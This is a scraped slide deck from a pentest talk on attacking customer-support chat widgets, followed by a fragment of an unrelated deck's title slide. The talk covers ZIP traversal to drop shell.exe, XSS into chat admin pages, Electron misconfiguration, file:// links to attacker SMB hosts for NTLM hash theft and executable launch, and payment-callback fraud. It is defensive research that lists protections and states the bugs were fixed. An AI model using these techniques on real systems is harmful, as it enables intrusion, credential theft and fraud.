Chat with a hacker. Increase attack surface for Pentest. A talk by Egor Karbutov and Alexey Pertsev

Size: px

Start display at page:

Download "Chat with a hacker. Increase attack surface for Pentest. A talk by Egor Karbutov and Alexey Pertsev"

Amanda Foster
6 years ago
Views:

1 Chat with a hacker Increase attack surface for Pentest A talk by Egor Karbutov and Alexey Pertsev

2 $ Whoarewe Egor Karbutov & Alexey Pertsev Penetration Security Speakers Bug Hunters 2

3 Agenda Chats-Chats-Chats How does it works? ZIP old tricks RCE via ZIP So much XSS Electron vulnerability Scheme file:// for your chats Payment through chats Mobile Application Chats 3

4 Disclaimer Chat images are taken for examples All coincidences are accidental 4

5 Chats-Chats-Chats What are you talking about? Another chat? 5

6 Chats-Chats-Chats What are you talking about? Another chat? 6

7 С 7

8 Chat Types Browsers CMS Desktop Application Social Networks Mobile SDK 8

9 Does it help us? Pentest! Increase attack surface Social engineering attacks Vulnerability of own implementations Vendors vulnerability User support is on the local network Lack of segmentation (network) 9

10 Chat for browsers. How does it works? JavaScript CMS = JS 10

11 JavaScript «Privileges» XML HTTP Request Control of user data Cookie Tokens Sensitive information HTML replace Remote update 11

12 Services 12

13 Services 12

14 Services 12

15 Files Social engineering attacks? Will you send an EXE files? We can use a couple of stupid tricks with ZIP 13

16 ZIP Bomb from 2014 :) 42 Kb 24 Gb? 322 Gb? 132 Tb? 4.5 Pb 14

17 ZIP Format 15

18 ZIP Traversal 16

19 api.servise.test Let s send a file User interface Operator standalone program storage.servise.test 17

20 api.servise.test Let s send a file User interface Operator standalone program Sending the file storage.servise.test cat.png 17

21 api.servise.test Let s send a file User interface Operator standalone program Sending the file storage.servise.test cat.png cat.png == id 17

22 api.servise.test Let s send a file User interface File Message file_path= /file/id Sending the file storage.servise.test Operator standalone program cat.png cat.png == id 17

23 api.servise.test Let s send a file User interface File Message file_path= /file/id File Message file_path= /file/id Operator standalone program Sending the file storage.servise.test cat.png cat.png == id 17

24 api.servise.test Let s send a file User interface File Message file_path= /file/id File Message file_path= /file/id Operator standalone program Sending the file storage.servise.test Concat( file_path); cat.png cat.png == id 17

25 api.servise.test Let s send a file User interface File Message file_path= /file/id File Message file_path= /file/id Operator standalone program Sending the file cat.png storage.servise.test cat.png == id Download file Concat( file_path); GET /file/id HTTP/1.1 Host: storage.service.test 17

26 api.servise.test Let s send a file User interface File Message file_path= /file/id File Message file_path= /file/id Operator standalone program %Downloads%/cat.png Sending the file cat.png storage.servise.test cat.png == id Download file Concat( file_path); GET /file/id HTTP/1.1 Host: storage.service.test 17

27 RCE via File api.servise.test User interface Operator standalone program 18

28 RCE via File api.servise.test User interface Operator standalone program Sending the file cat.png 18

29 RCE via File api.servise.test User interface File Message file_path =.hacker.site/file/id Operator standalone program Sending the file cat.png 18

30 RCE via File api.servise.test User interface File Message file_path =.hacker.site/file/id File Message file_path =.hacker.test/file/id Operator standalone program Sending the file cat.png 18

31 RCE via File api.servise.test User interface File Message file_path =.hacker.site/file/id File Message file_path =.hacker.test/file/id Operator standalone program Sending the file Concat( file_path); cat.png 18

32 RCE via File api.servise.test User interface File Message file_path =.hacker.site/file/id File Message file_path =.hacker.test/file/id Operator standalone program storage.servise.test.hacke.site Sending the file Concat( file_path); cat.png 18

33 RCE via File api.servise.test User interface File Message file_path =.hacker.site/file/id File Message file_path =.hacker.test/file/id Operator standalone program storage.servise.test.hacke.site Sending the file Concat( file_path); cat.png../../../../../../../shell.exe == id 18

34 RCE via File api.servise.test User interface File Message file_path =.hacker.site/file/id File Message file_path =.hacker.test/file/id Operator standalone program storage.servise.test.hacke.site Sending the file Download file Concat( file_path); GET /file/id HTTP/1.1 Host: storage.service.test.hacke.site cat.png../../../../../../../shell.exe == id 18

35 RCE via File api.servise.test User interface File Message file_path =.hacker.site/file/id File Message file_path =.hacker.test/file/id Operator standalone program %Downloads%/shell.exe storage.servise.test.hacke.site Sending the file Download file Concat( file_path); GET /file/id HTTP/1.1 Host: storage.service.test.hacke.site cat.png../../../../../../../shell.exe == id 18

36 XSS XSS is the maximum impact High level of message security Not obvious places Headers GET/POST parameters for analytics Our target is Admin page or statistic page 19

37 Headers for XSS User-Agent Referrer Cookie Origin Custom Headers 20

38 Parameters for XSS Methods GET POST WebSocket Keep it simple. Use gray box analysis! 21

39 Admin & Statistic Page Waiting for someone to visit this page Abuse of complaints against administrators 22

40 The sad consequences XSS into chat settings Appearance customisation Fonts Labels Color Image etc 23

41 Attack scheme 1 Evil Hacker pentest_client.shop.test 24

42 Attack scheme 1 Evil Hacker pentest_client.shop.test XSS attack on chat 24

43 Attack scheme 1 Evil Hacker pentest_client.shop.test statistic_vendor.chat.test admin_vendor.chat.test XSS attack on chat 24

44 Attack scheme 1 Evil Hacker XSS attack on chat pentest_client.shop.test XSS attack on client admins statistic_vendor.chat.test admin_vendor.chat.test 24

45 Attack scheme 1 Evil Hacker XSS attack on chat pentest_client.shop.test XSS attack on client admins statistic_vendor.chat.test admin_vendor.chat.test 24

46 Attack scheme 1 Evil Hacker XSS attack on chat pentest_client.shop.test XSS attack on client admins statistic_vendor.chat.test admin_vendor.chat.test JS code injection into chat settings 24

47 Attack scheme 1 Evil Hacker XSS attack on chat pentest_client.shop.test XSS attack on client admins statistic_vendor.chat.test admin_vendor.chat.test JS code injection into chat settings XSS from any user on the site 24

48 Attack scheme 1 Evil Hacker XSS attack on chat pentest_client.shop.test XSS attack on client admins statistic_vendor.chat.test admin_vendor.chat.test pentest_client.shop.test JS code injection into chat settings XSS from any user on the site 24

49 Attack scheme 2 Evil Hacker chat.vendor statistic.chat.vendor admin.chat.vendor 25

50 Attack scheme 2 Evil Hacker chat.vendor statistic.chat.vendor admin.chat.vendor XSS attack on chat 25

51 Attack scheme 2 Evil Hacker XSS attack on chat chat.vendor XSS attack on vendor admins statistic.chat.vendor admin.chat.vendor 25

52 Attack scheme 2 Evil Hacker XSS attack on chat chat.vendor XSS attack on vendor admins statistic.chat.vendor admin.chat.vendor 25

53 Attack scheme 2 Evil Hacker XSS attack on chat chat.vendor XSS attack on vendor admins statistic.chat.vendor admin.chat.vendor JS code injection into chat settings 25

54 Attack scheme 2 Evil Hacker XSS attack on chat chat.vendor XSS attack on vendor admins statistic.chat.vendor admin.chat.vendor JS code injection into chat settings XSS from any user on the site 25

55 Attack scheme 2 Evil Hacker XSS attack on chat chat.vendor XSS attack on vendor admins statistic.chat.vendor admin.chat.vendor chat.vendor XSS from any user on the site JS code injection into chat settings 25

56 Attack scheme 2 Evil Hacker XSS attack on chat chat.vendor XSS attack on vendor admins statistic.chat.vendor admin.chat.vendor XSS from any user on chat clients chat.vendor XSS from any user on the site JS code injection into chat settings 25

57 Attack scheme 2 Evil Hacker XSS attack on chat chat.vendor XSS attack on vendor admins statistic.chat.vendor admin.chat.vendor statistic_vendor.chat.test admin_vendor.chat.test chat.test All chat clients services XSS from any user on chat clients chat.vendor XSS from any user on the site JS code injection into chat settings 25

58 Electron OpenSource framework to build desktop apps using HTML, CSS and JavaScript Electron accomplishes this by combining Chromium and Node.js into a single runtime Chats vendor use Electron for admin desktop applications 26

59 Electron Threat Model Electron Threat Model = Browser Threat Model Untrusted content from the web SOP Bypass Control whether access to Node.js primitives is allowed from JavaScript Potential access to Node.js primitives Limited sandbox XSS == RCE

60 Electron sandbox bypass nodeintegration = true Electron

61 Electron sandbox bypass nodeintegration = true Misconfiguration SOP bypass via presence of privileged URLs Switch false 29

62 File:// Typically used to retrieve files from networks and local disks Vulnerability in the wild Local File Inclusion XXE SSRF Windows context NTLM Hash Stealing NTLM Relay RCE 30

63 Chats with File:// Admin desktop application for Windows Available scheme file:// Scheme file:// like hyperlink 31

64 Chats with File:// Pentest in local network RCE on client device and servers Weakness & duplicate passwords (local services, servers, client devices) pentest_client.shop.test Send file:// link Admin desktop application Send NTLM hash Hacker SMB Hash Cracking file://hacker.test/ SMB Relay 32

65 Tricks with File:// 1 What can we do? File:// with local files file://c:/windows/system32/calc.exe But we can t use arguments file://c:/windows/system32/cmd.exe /C calc All symbols in file link is a path It is only for social engineering attacks You can combine this with dir traversal ZIP trick 33

66 Tricks with File:// 2 File:// with execute files from the Internet (Hacker SMB server) file://internet_ip/pwn.exe 34

67 Chats with File:// Pentest internet service and local network RCE on client device Social engineering attacks + file://local_files Admin OS pentest_client.shop.test Send file:// link on execute file file://hacker.test/shell.exe Admin desktop application Download shell.exe Hacker SMB Executing shell.exe Clicking on the link 35

68 Tricks with File:// 3 How to bypass Windows alert window? This file is in a location outside your local network Easy, I ll use local addresses No, it isn t work 36

69 Tricks with File:// 3 Local network from OS Windows is servers with NetBios name NetBios name - Domain names without dot If I ll use NetBios name netbios instead of local IP, I can bypass that alert file://netbios/pwn.exe How? Smbd (samba) server + responder d netbios I eth0 Working only in local networks 37

70 Chats with File:// NetBios name trick in local network Without alert window Admin OS pentest_client.shop.test Send file:// link on execute file file://netbios/pwn.exe Admin desktop application Download shell.exe Hacker SMB Executing shell.exe Clicking on the link 38

71 Add payment system Useful? Be careful to store a configs! 39

72 Hacker can buy IPhone for free Shop backend 40

73 Hacker can buy IPhone for free POST /pay?params=1 shopid customer sum item Shop backend 40

74 Hacker can buy IPhone for free POST /pay?params=1 Shop backend shopid customer sum item Redirect to payment page 40

75 Hacker can buy IPhone for free POST /pay?params=1 shopid customer sum item Redirect to payment page YES checkurl Shop backend 40

76 Hacker can buy IPhone for free Shop backend POST /pay?params=1 shopid customer sum item Redirect to payment page YES checkurl Evil Hacker 40

77 Hacker can buy IPhone for free Shop backend POST /pay?params=1 shopid customer sum item Redirect to payment page YES checkurl IPhone X avisourl Evil Hacker 40

with similar name Change shopid via XSS Call checkurl and avisourl as needed

78 Stealing money for hackers POST /pay?params=1 shopid customer sum item Steps to take profit: Register own shop with similar name Change shopid via XSS Call checkurl and avisourl as needed All payments for hackers! Protection: Check Yandex Ips Add anti-csrf token for config form DO NOT SHOW ANY PASSWORDS EVER 41

79 Mobile Application SDK Custom code for native applications All code have only one privileges in Mobile OS 3rd party applications have full access in your app Change the user interface Access to local files in folder app Access to dynamic user data Change logic app (like tapjacking) Vulnerability Custom implementation WebView JS manipulation (Android) 42

80 ExpensiveWall ExpensiveWall is spread to different apps as an SDK called gtk, ExpensiveWall sends data about the infected device to its C&C server, including its location and unique identifiers, such as MAC and IP addresses, IMSI, and IMEI. Total Downloads infected applications = 5,904,

81 Don t forget about Farms that overestimate the rating of applications Dynamic code execution and code update JSPatch ios Android Runtime Valid Ad that were vulnerable Application with fake (Ad) SDK Code review custom SDK code 44

other people s implementations, applications in your devices, plugins in your

82 Conclusion For pentest and red team Increase your attack surface via 3rd party services and program library For you and your project Think how much you trust other people s implementations, applications in your devices, plugins in your program Don t forget about code review! All vulnerability are reported and fixed 45

83 Questions? Egor Alexey Pertsev

Man-In-The-Browser Attacks. Daniel Tomescu

Man-In-The-Browser Attacks. Daniel Tomescu Man-In-The-Browser Attacks Daniel Tomescu 1 About me Work and education: Pentester @ KPMG Romania Moderator @ Romanian Security Team MSc. Eng. @ University Politehnica of Bucharest OSCP, CREST CRT Interests: